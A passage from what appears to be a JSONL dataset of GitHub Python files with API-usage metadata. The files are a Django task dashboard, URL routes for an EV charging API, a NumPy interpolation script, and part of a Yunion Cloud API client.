"matplotlib.pyplot.title", "line_number": 678, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 678, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 681, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 691, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 691, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 699, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 699, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 709, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 709, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 717, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 717, "usage_type": "name"}, {"api_name": "pandas.merge", "line_number": 732, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 740, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 740, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 741, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 741, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 742, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 743, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 743, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 773, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 774, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 782, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 816, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 829, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 895, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 920, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 942, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 956, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 990, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 1000, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 1001, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 1002, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 1003, "usage_type": "call"}, {"api_name": "lightgbm.reset_parameter", "line_number": 1010, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1015, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 1016, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1030, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1045, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1046, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1055, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1060, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1061, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1061, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 1062, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1062, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 1063, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1063, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 1064, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1064, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1065, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1065, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 1066, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1066, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 1073, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 1075, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1084, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 1105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 1106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1107, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1116, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1118, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1119, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1133, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 1139, "usage_type": "call"}, {"api_name": "sklearn.ensemble.VotingClassifier", "line_number": 1160, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 1166, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 1193, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 1198, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.Parallel", "line_number": 1204, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.delayed", "line_number": 1205, "usage_type": "call"}, {"api_name": "sklearn.base.clone", "line_number": 1205, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 1217, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 1222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1233, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1239, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 1240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1248, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1249, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1250, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1250, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 1251, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1251, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 1252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1253, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1262, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1264, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1265, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1285, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1288, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1297, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1299, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1301, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1303, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1319, "usage_type": "name"}]}
+{"seq_id": "19575685423", "text": "from django.shortcuts import render\nfrom task_manager.tasks.models import Task\nfrom task_manager.projects.models import Project\n\n\ndef dashboard_view(request):\n # Общие данные\n total_tasks = Task.objects.count()\n total_open_tasks = Task.objects.exclude(status__name=\"завершена\").count()\n\n # Данные по проектам\n projects_data = []\n for project in Project.objects.all():\n project_tasks = Task.objects.filter(project=project)\n project_open_tasks = project_tasks.exclude(status__name=\"завершена\")\n projects_data.append({\n 'project_name': project.name,\n 'total_tasks': project_tasks.count(),\n 'open_tasks': project_open_tasks.count(),\n })\n\n context = {\n 'total_tasks': total_tasks,\n 'total_open_tasks': total_open_tasks,\n 'projects': projects_data,\n }\n\n return render(request, 'task_manager/dashboard.html', context)\n", "repo_name": "NikGor/TaskManager", "sub_path": "task_manager/dashboard/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "task_manager.tasks.models.Task.objects.count", "line_number": 8, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 8, "usage_type": "name"}, {"api_name": "task_manager.tasks.models.Task.objects.exclude", "line_number": 9, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 9, "usage_type": "name"}, {"api_name": "task_manager.projects.models.Project.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "task_manager.projects.models.Project.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "task_manager.projects.models.Project", "line_number": 13, "usage_type": "name"}, {"api_name": "task_manager.tasks.models.Task.objects.filter", "line_number": 14, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "14829944383", "text": "from django.urls import path\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\nfrom .views import UserRegisterView, UserLoginView, UserProfileView, UserView, BookingViewSet, PaymentViewSet\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"EV Charging Locator API\",\n default_version='v1',\n description=\"EV Charging Locator API\",\n terms_of_service=\"\",\n contact=openapi.Contact(email=\"\"),\n license=openapi.License(name=\"\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\nurlpatterns = [\n path('swagger', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n path('register/', UserRegisterView.as_view(), name='user-register'),\n path('login/', UserLoginView.as_view(), name='user-login'),\n path('profile/', UserProfileView.as_view(), name='user-profile'),\n path('user/', UserView.as_view(), name='user'),\n path('bookings/', BookingViewSet.as_view({'post': 'create', 'get': 'list'}), name='bookings-list'),\n path('bookings//', BookingViewSet.as_view({'get': 'retrieve', 'put': 'update', 'delete': 'destroy'}), name='bookings-detail'),\n path('payment/', PaymentViewSet.as_view({'post': 'create'}), name='payment-create'),\n]\n \n \n", "repo_name": "nbanda2023/evproject", "sub_path": "api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "drf_yasg.views.get_schema_view", "line_number": 12, "usage_type": "call"}, {"api_name": "drf_yasg.openapi.Info", "line_number": 13, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 13, "usage_type": "name"}, {"api_name": "drf_yasg.openapi.Contact", "line_number": 18, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 18, "usage_type": "name"}, {"api_name": "drf_yasg.openapi.License", "line_number": 19, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 22, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UserRegisterView.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UserRegisterView", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UserLoginView.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UserLoginView", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UserProfileView.as_view", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UserProfileView", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "views.UserView.as_view", "line_number": 31, "usage_type": "call"}, {"api_name": "views.UserView", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "views.BookingViewSet.as_view", "line_number": 32, "usage_type": "call"}, {"api_name": "views.BookingViewSet", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "views.BookingViewSet.as_view", "line_number": 33, "usage_type": "call"}, {"api_name": "views.BookingViewSet", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "views.PaymentViewSet.as_view", "line_number": 34, "usage_type": "call"}, {"api_name": "views.PaymentViewSet", "line_number": 34, "usage_type": "name"}]}
+{"seq_id": "2252701539", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import sqrt\r\n\r\n# data from file 8\r\nx_points = np.array([ -1.2000000e+001,\r\n -1.0000000e+001,\r\n -8.0000000e+000,\r\n -6.0000000e+000,\r\n -4.0000000e+000,\r\n -2.0000000e+000,\r\n 0.0000000e+000,\r\n 2.0000000e+000,\r\n 4.0000000e+000,\r\n 6.0000000e+000,\r\n 8.0000000e+000])\r\n\r\ny_points = np.array([ -4.7169811e-002,\r\n -2.8571429e-002,\r\n -2.3809524e-002,\r\n -4.5454545e-002,\r\n-1.0000000e-001,\r\n -1.6666667e-001,\r\n-1.0000000e-001,\r\n -4.5454545e-002,\r\n -2.3809524e-002,\r\n-1.4285714e-002,\r\n -9.4339623e-003])\r\n\r\n\r\ndef divided_diff(x, y):\r\n n = len(y)\r\n coef = np.zeros([n, n])\r\n\r\n coef[:, 0] = y\r\n\r\n for j in range(1, n):\r\n for i in range(n - j):\r\n coef[i][j] = \\\r\n (coef[i + 1][j - 1] - coef[i][j - 1]) / (x[i + j] - x[i])\r\n\r\n return coef\r\n\r\ndef newton_poly(coef, x_data, x):\r\n n = len(x_data) - 1\r\n p = coef[n]\r\n for k in range(1,n+1):\r\n p = coef[n-k] + (x -x_data[n-k])*p\r\n return p\r\n\r\n\r\na_s = divided_diff(x_points, y_points)[0, :]\r\n\r\nx_new = np.arange(-12, 8.1, .1)\r\ny_new = newton_poly(a_s, x_points, x_new)\r\n\r\ndef cubic_interp1d(x0, x, y):\r\n\r\n x = np.asfarray(x)\r\n y = np.asfarray(y)\r\n\r\n if np.any(np.diff(x) < 0):\r\n indexes = np.argsort(x)\r\n x = x[indexes]\r\n y = y[indexes]\r\n\r\n size = len(x)\r\n\r\n xdiff = np.diff(x)\r\n ydiff = np.diff(y)\r\n\r\n Li = np.empty(size)\r\n Li_1 = np.empty(size-1)\r\n z = np.empty(size)\r\n\r\n Li[0] = sqrt(2*xdiff[0])\r\n Li_1[0] = 0.0\r\n B0 = 0.0\r\n z[0] = B0 / Li[0]\r\n\r\n for i in range(1, size-1, 1):\r\n Li_1[i] = xdiff[i-1] / Li[i-1]\r\n Li[i] = sqrt(2*(xdiff[i-1]+xdiff[i]) - Li_1[i-1] * Li_1[i-1])\r\n Bi = 6*(ydiff[i]/xdiff[i] - ydiff[i-1]/xdiff[i-1])\r\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\r\n\r\n i = size - 1\r\n Li_1[i-1] = xdiff[-1] / Li[i-1]\r\n Li[i] = sqrt(2*xdiff[-1] - Li_1[i-1] * Li_1[i-1])\r\n Bi = 0.0\r\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\r\n\r\n\r\n i = size-1\r\n z[i] = z[i] / Li[i]\r\n for i in range(size-2, -1, -1):\r\n z[i] = (z[i] - Li_1[i-1]*z[i+1])/Li[i]\r\n\r\n index = x.searchsorted(x0)\r\n np.clip(index, 1, size-1, index)\r\n\r\n xi1, xi0 = x[index], x[index-1]\r\n yi1, yi0 = y[index], y[index-1]\r\n zi1, zi0 = z[index], z[index-1]\r\n hi1 = xi1 - xi0\r\n\r\n f0 = zi0/(6*hi1)*(xi1-x0)**3 + \\\r\n zi1/(6*hi1)*(x0-xi0)**3 + \\\r\n (yi1/hi1 - zi1*hi1/6)*(x0-xi0) + \\\r\n (yi0/hi1 - zi0*hi1/6)*(xi1-x0)\r\n return f0\r\n\r\nplt.figure(figsize = (12, 8))\r\nplt.scatter(x_points, y_points)\r\nplt.plot(x_points, y_points, 'bo')\r\nplt.plot(x_new, y_new)\r\nX_new = np.linspace(-12, 2.1, 201)\r\nplt.plot(x_new, cubic_interp1d(x_new, x_points, y_points))\r\nplt.show()\r\n", "repo_name": "kopczyn12/numerical-methods", "sub_path": "interpolation_methods/mn8.py", "file_name": "mn8.py", "file_ext": "py", "file_size_in_byte": 2779, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.asfarray", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.asfarray", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 74, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 76, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]}
+{"seq_id": "43238082118", "text": "import logging\nimport json\n\nfrom yunionclient.common import http\n\nfrom yunionclient.api import zones\nfrom yunionclient.api import keypairs\nfrom yunionclient.api import hosts\nfrom yunionclient.api import wires\nfrom yunionclient.api import hostwires\nfrom yunionclient.api import storages\nfrom yunionclient.api import hoststorages\n\nfrom yunionclient.api import networks\nfrom yunionclient.api import disks\nfrom yunionclient.api import guests\nfrom yunionclient.api import guestdisks\nfrom yunionclient.api import guestnetworks\nfrom yunionclient.api import groupnetworks\n\nfrom yunionclient.api import groupguests\n\nfrom yunionclient.api import flavors\n\nfrom yunionclient.api import usages\n\nfrom yunionclient.api import logs\n\nfrom yunionclient.api import images\n\nfrom yunionclient.api import vncproxy\n\nfrom yunionclient.api import sshrelay\n\nfrom yunionclient.api import quotas\n\nfrom yunionclient.api import secgroups\n\nfrom yunionclient.api import dnsrecords\n\nfrom yunionclient.api import baremetalagents\nfrom yunionclient.api import baremetals\nfrom yunionclient.api import baremetalnetworks\nfrom yunionclient.api import baremetalstorages\n\nfrom yunionclient.api import reservedips\n\nfrom yunionclient.api import scheduler\n\nfrom yunionclient.api.stats import RegionStatsManager\n\nfrom yunionclient.api.tenantinfo import TenantInfo, TenantInfoManager\n\nfrom yunionclient.api import users\nfrom yunionclient.api import tenants\nfrom yunionclient.api import projects\nfrom yunionclient.api import groups\nfrom yunionclient.api import roles\nfrom yunionclient.api import groupusers\n\nfrom yunionclient.api import ec2credentials\nfrom yunionclient.api import services\nfrom yunionclient.api import endpoints\nfrom yunionclient.api import schedtags\nfrom yunionclient.api import metadatas\nfrom yunionclient.api import loadbalancers\n\nlogger = logging.getLogger(__name__)\n\n\nclass Client(http.HTTPClient):\n \"\"\"Client for Yunion Cloud API\n \"\"\"\n\n def __init__(self, auth_url, username, password, domain_name,\n region=None, zone=None, endpoint_type='internalURL',\n timeout=600, insecure=False):\n \"\"\" Initialize a new client for the Images v1 API. \"\"\"\n super(Client, self).__init__(timeout, insecure)\n\n self.auth_url = auth_url\n self.username = username\n self.password = password\n self.domain_name = domain_name\n\n self.endpoint_type = endpoint_type\n\n self.set_region(region, zone)\n\n self.default_tenant = None\n self.tenants_info_manager = TenantInfoManager()\n\n self.keypairs = keypairs.KeypairManager(self)\n self.zones = zones.ZoneManager(self)\n self.hosts = hosts.HostManager(self)\n self.wires = wires.WireManager(self)\n self.storages = storages.StorageManager(self)\n\n self.hostwires = hostwires.HostwireManager(self)\n self.hoststorages = hoststorages.HoststorageManager(self)\n\n self.networks = networks.NetworkManager(self)\n self.disks = disks.DiskManager(self)\n\n self.flavors = flavors.FlavorManager(self)\n\n self.guests = guests.GuestManager(self)\n\n self.guestnetworks = guestnetworks.GuestnetworkManager(self)\n self.groupnetworks = groupnetworks.GroupnetworkManager(self)\n self.guestdisks = guestdisks.GuestdiskManager(self)\n\n self.groupguests = groupguests.GroupguestManager(self)\n\n self.usages = usages.UsageManager(self)\n\n self.images = images.ImageManager(self)\n\n self.vncproxy = vncproxy.VNCProxyManager(self)\n\n self.sshrelay = sshrelay.SSHRelayManager(self)\n\n self.logs = logs.LogManager(self)\n\n self.quotas = quotas.QuotaManager(self)\n\n self.scheduler = scheduler.SchedulerManager(self)\n\n self.users = users.UserManager(self)\n self.tenants = tenants.TenantManager(self)\n self.projects = projects.ProjectManager(self)\n self.groups = groups.GroupManager(self)\n self.roles = roles.RoleManager(self)\n self.groupusers = groupusers.GroupuserManager(self)\n\n self.ec2credentials = ec2credentials.EC2CredentialManager(self)\n self.services = services.ServiceManager(self)\n self.endpoints = endpoints.EndpointManager(self)\n\n self.secgroups = secgroups.SecuritygroupManager(self)\n\n self.dns = dnsrecords.DNSRecordManager(self)\n\n self.baremetalagents = baremetalagents.BaremetalAgentManager(self)\n self.baremetals = baremetals.BaremetalManager(self)\n self.baremetalnetworks = baremetalnetworks.BaremetalnetworkManager(self)\n self.baremetalstorages = baremetalstorages.BaremetalstorageManager(self)\n\n self.reservedips = reservedips.ReservedIPManager(self)\n\n self.schedtags = schedtags.SchedtagManager(self)\n self.schedtag_hosts = schedtags.SchedtagHostManager(self)\n\n self.region_stats = RegionStatsManager(self)\n self.metadatas = metadatas.MetadataManager(self)\n self.loadbalancers = loadbalancers.LoadbalancerManager(self)\n self.loadbalancerlisteners = loadbalancers.LoadbalancerListenerManager(self)\n self.loadbalancerlistenerrules = loadbalancers.LoadbalancerListenerRuleManager(self)\n self.loadbalancercertificates = loadbalancers.LoadbalancerCertificateManager(self)\n self.loadbalancerbackendgroups = loadbalancers.LoadbalancerBackendGroupManager(self)\n self.loadbalancerbackends = loadbalancers.LoadbalancerBackendManager(self)\n self.loadbalanceracls = loadbalancers.LoadbalancerAclManager(self)\n\n self.loadbalancerclusters = loadbalancers.LoadbalancerClusterManager(self)\n self.loadbalanceragents = loadbalancers.LoadbalancerAgentManager(self)\n\n def set_region(self, region, zone=None):\n self.region = region\n self.zone = zone\n\n def _authenticatev3(self, project_name=None, project_id=None):\n logging.info('authenticate %s %s' % (project_name, project_id))\n auth = {}\n user = {'name': self.username, 'password': self.password}\n if self.domain_name:\n user['domain'] = {'name': self.domain_name}\n else:\n user['domain'] = {'id': 'default'}\n auth['identity'] = {'methods': ['password'],\n 'password': {'user': user}}\n project = {}\n if project_name:\n project['name'] = project_name\n project['domain'] = {'id': 'default'}\n if project_id:\n project['id'] = project_id\n auth['scope'] = {'project': project}\n body = {'auth': auth}\n resp, body = self._json_request(self.auth_url, None,\n 'POST', '/auth/tokens', body=body)\n if 'token' in body:\n token_id = resp['x-subject-token']\n if 'project' in body['token']:\n self.default_tenant = TenantInfo(None, None)\n token = {'id': token_id,\n 'tenant': body['token']['project'],\n 'expires': body['token']['expires_at']}\n catalog = body['token']['catalog']\n user = body['token']['user']\n self.default_tenant.set_access_info(token, catalog, user)\n self.tenants_info_manager.add_tenant(self.default_tenant)\n else:\n self._fetch_tenants(token_id)\n return True\n else:\n raise Exception('Wrong return format %s' % json.dumps(body))\n\n def _authenticate(self, tenant_name=None, tenant_id=None):\n logging.info('authenticate %s %s' % (tenant_name, tenant_id))\n auth = {}\n auth['passwordCredentials'] = {'username': self.username,\n 'password': self.password}\n if tenant_id is not None and len(tenant_id) > 0:\n auth['tenantId'] = tenant_id\n elif tenant_name is not None and len(tenant_name) > 0:\n auth['tenantName'] = tenant_name\n body = {'auth': auth}\n resp, body = self._json_request(self.auth_url, None,\n 'POST', '/tokens', body=body)\n # print json.dumps(body, indent=4)\n if 'access' in body:\n token = body['access']['token']\n catalog = body['access']['serviceCatalog']\n user = body['access']['user']\n if 'tenant' in token:\n self.default_tenant = TenantInfo(None, None)\n # print 'Token:', token\n self.default_tenant.set_access_info(token, catalog, user)\n self.tenants_info_manager.add_tenant(self.default_tenant)\n else:\n self._fetch_tenants(token['id'])\n return True\n else:\n raise Exception('Wrong return format %s' % json.dumps(body))\n return False\n\n def _fetch_tenants(self, token):\n try:\n resp, body = self._json_request(self.auth_url, token,\n 'GET', '/tenants')\n if 'tenants' in body:\n for t in body['tenants']:\n self.tenants_info_manager.add_tenant(TenantInfo(t['id'],\n t['name']))\n return True\n except Exception as e:\n raise Exception('_fetch_tenants %s' % e)\n return False\n\n def get_tenants(self):\n self._authenticate(None, None)\n return self.tenants_info_manager.get_tenants()\n\n def set_project(self, project_name=None, project_id=None):\n return self.set_tenant(tenant_name=project_name, tenant_id=project_id)\n\n def set_tenant(self, tenant_name=None, tenant_id=None):\n tenant = self.tenants_info_manager.get_tenant(tenant_id=tenant_id,\n tenant_name=tenant_name)\n if tenant is None:\n return self._authenticatev3(project_name=tenant_name,\n project_id=tenant_id)\n else:\n self.default_tenant = tenant\n return True\n\n def get_default_tenant(self):\n if self.default_tenant is None:\n raise Exception('No tenant specified')\n # if self.default_tenant.expire_soon():\n # self._authenticate(tenant_name=self.default_tenant.get_name(),\n # tenant_id=self.default_tenant.get_id())\n return self.default_tenant\n\n def get_regions(self):\n t = self.get_default_tenant()\n if t is not None:\n return t.get_regions()\n else:\n return None\n\n def get_endpoint(self, service, admin_api=False, region=None, zone=None):\n t = self.get_default_tenant()\n if t is not None:\n if admin_api:\n ep_type = 'adminURL'\n else:\n ep_type = self.endpoint_type\n if region is None:\n region = self.region\n if zone is None:\n zone = self.zone\n return t.get_endpoint(region, service, ep_type, zone=zone)\n else:\n raise Exception('No tenant specified')\n\n def _wrapped_request(self, func, service, admin_api, method, url, **kwargs):\n t = self.get_default_tenant()\n if t is not None:\n ep = self.get_endpoint(service, admin_api)\n if ep is not None:\n ep = self._strip_version(ep)\n return func(ep, t.get_token(), method, url, 